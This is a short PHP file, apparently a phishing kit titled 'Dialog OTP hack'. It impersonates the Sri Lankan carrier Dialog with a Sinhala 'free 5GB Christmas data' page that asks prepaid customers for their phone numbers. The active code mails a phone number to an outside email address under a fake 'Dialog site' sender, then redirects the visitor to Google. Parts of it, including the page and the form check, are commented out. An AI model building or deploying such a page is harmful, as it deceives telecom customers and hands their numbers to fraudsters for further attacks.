<?php
//print '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Dialog OTP hack</title><style>*{margin:0;padding:0;box-sizing:border-box}body{font-family:Verdana,Geneva,Tahoma,sans-serif;background-color:#eef0f7;display:grid;place-items:center;min-height:100vh;overflow:hidden}.container{background-color:#fff;width:600px;height:450px;position:relative;display:grid;grid-template-columns:1fr 1fr;place-items:center;line-height:1.5;box-shadow:0 20px 30px rgba(0,0,0,.185)}.container::after{content:"";position:absolute;background-image:linear-gradient(to bottom right,#ff1a1a,#1aff1a);width:900px;height:900px;border-radius:50%;z-index:-1}.container-close{position:absolute;top:-15px;right:-15px;background-color:#fff;width:45px;height:45px;display:grid;place-items:center;font-size:1.7rem;color:#2e4052;border-radius:50%;box-shadow:0 10px 20px rgba(0,0,0,.164);cursor:pointer}.container img{width:250px;height:400px;object-fit:cover;object-position:center}.container-text{padding:10px 40px 10px 10px}.container-text h2{font-size:1.2rem;color:#1a2250}.container-text p{font-size:14px;color:#3b4169;margin:10px 0}.container-text button,.container-text input{width:100%;border:0;padding:14px;border-radius:3px}.container-text input{border:2px solid #daddec;margin:5px 0 10px;font-size:1rem;color:#656880}.container-text button{background-image:linear-gradient(to right,#89caff,#6589ff);display:block;color:#fff;font-size:1rem;cursor:pointer;box-shadow:0 5px 20px #89caff94;transition:box-shadow .3s ease-in-out}.container-text button:hover{box-shadow:none}.container-text span{display:block;text-align:center;margin:20px 0 0;color:#babdcb;font-size:12px}</style></head><body><div class="container"><div class="container-close">&times;</div><img src="https://i.postimg.cc/Fzy5L3by/Best-Christmas-and-New-Year-Mobile-Apps-of-2019-22.jpg&auto=format&fit=crop&w=650&q=100" alt="christmas banner image"><div class="container-text"><h2>Dialog නත්තල් තෑග්ග...<br><small>5GB Data නොමිළේ...!</small></h2><p>Dialog ජංගම සේවා පාරිභෝගික<br>ඔබට මේ සීතල දෙසැම්බරයේ නත්තල් සිරි අසිරිය බෙදා හදාගැනීමට<br>නොමිලේ 5GB data* අපෙන්...</p><form method="POST" autocomplete="on"><input type="tel" placeholder="0761234567" value="07" required autofocus><button type="submit">Verify Now</button></form><span><b>නොමිලේ Data ලබාගැනීමට ඔබගේ ඩයලොග් පෙර ගෙවුම් ජංගම සේවා නම්බරය ඉහත කොටුවේ යොදා "Verify Now" බටනය click කරන්න.</b><br><small>* - නියමයන් හා කොන්දේසි අදාළ වේ.</small></span></div></div></body></html>';

//if(isset($_POST['submit']))	{
	$phone = "0768666693";
	$subject = "New Phone number Recieved.";
	$message = "New number is : ".$phone.".";
	$headers = "From: Your Dialog site";
	mail("hsindustries.lk@proton.me",$subject,$message,$headers);
	header("Location: https://google.com");
	die();
flush();
?>